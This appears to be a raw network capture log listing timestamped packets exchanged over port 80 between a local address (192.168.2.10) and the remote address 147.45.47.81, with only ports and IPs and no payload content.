                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957350016 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957357883 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957360029 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957366943 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957379103 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957415104 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957480907 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957490921 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957495928 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957504034 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957508087 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957513094 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957526922 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957532883 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957573891 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957573891 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957573891 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957603931 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957613945 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957623005 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957632065 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957643032 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957657099 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957665920 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957792997 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957811117 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957822084 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957830906 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957839966 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957850933 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957855940 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957861900 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957906961 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957917929 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957954884 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.958476067 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.958487034 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.958496094 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.958507061 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.958544016 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.958642960 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.958655119 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.958663940 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.958673000 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.958681107 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.958682060 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.958692074 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.958700895 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.958710909 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.958714962 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.958720922 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.958739996 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.958750963 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.958769083 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.958780050 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.958796978 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.958806038 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.958816051 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.958832026 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.958842993 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.958967924 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.958977938 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.958992004 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.959001064 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.959012032 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.959013939 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.959037066 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.959059954 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.959482908 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.959670067 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.959682941 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.959687948 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.959697008 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.959702015 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.959711075 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.959719896 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.959729910 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.959736109 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.959738970 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.959748983 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.959758043 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.959760904 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.959767103 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.959778070 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.959779024 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.959790945 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.959799051 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.959839106 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.959991932 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.960006952 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.960047960 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.960318089 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.960334063 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.960371017 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.960460901 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.960470915 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.960479975 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.960489988 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.960500002 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.960508108 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.960510015 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.960519075 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.960527897 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.960539103 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.960560083 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.960589886 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.960601091 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.960655928 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.960781097 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.960794926 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.960808039 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.960827112 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.960845947 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.960964918 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.960974932 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.960979939 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.960984945 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.960988998 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.961040974 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.961157084 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.961167097 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.961175919 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.961183071 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.961189985 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.961199045 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.961208105 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.961209059 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.961218119 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.961222887 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.961237907 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.961266994 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.961322069 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.961333036 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.961340904 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.961349964 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.961359024 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.961368084 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.961375952 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.961378098 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.961409092 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.961409092 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.961786985 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.961797953 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.961811066 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.961843014 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.961947918 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.961958885 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.961967945 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.961972952 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.961977959 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.961987019 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.961996078 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962004900 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962014914 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962017059 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962038040 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962048054 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962088108 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962105036 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962116003 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962122917 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962136030 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962145090 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962153912 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962153912 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962177038 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962277889 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962287903 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962300062 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962311983 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962318897 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962321043 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962337017 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962346077 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962356091 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962363958 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962373018 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962449074 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962452888 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962467909 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962479115 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962518930 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962635994 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962646961 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962657928 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962671995 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962683916 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962687969 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962692976 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962702990 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962713003 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962714911 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962723017 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962794065 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962810040 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962821007 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962830067 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962840080 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962855101 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962886095 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962894917 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962985039 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.962995052 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.963005066 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.963013887 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.963021040 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.963022947 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.963032007 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.963032961 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.963042974 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.963057995 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.963082075 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.964325905 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.964342117 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.964396000 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.964498043 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.964509010 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.964519024 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.964551926 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.111855030 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.118681908 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.118700981 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.118711948 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.118781090 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.118793011 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.118802071 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.118812084 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.118941069 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.118951082 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.118961096 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.118971109 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.118980885 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.118992090 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119002104 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119012117 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119025946 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119096041 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119107008 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119117975 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119128942 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119240046 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119250059 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119261980 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119272947 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119282961 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119299889 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119333982 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119333982 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119333982 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119333982 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119333982 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119333982 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119333982 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119379997 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119379997 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119379997 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119379997 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119379997 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119395018 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119407892 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119417906 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119429111 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119442940 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119452000 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119462967 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119529963 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119540930 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119556904 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119647026 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119647026 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119704008 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119707108 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119719982 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119729996 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119740009 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119750023 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119760990 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119771004 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119781017 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119790077 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119800091 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119810104 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119848967 CET8049957147.45.47.81192.168.2.10
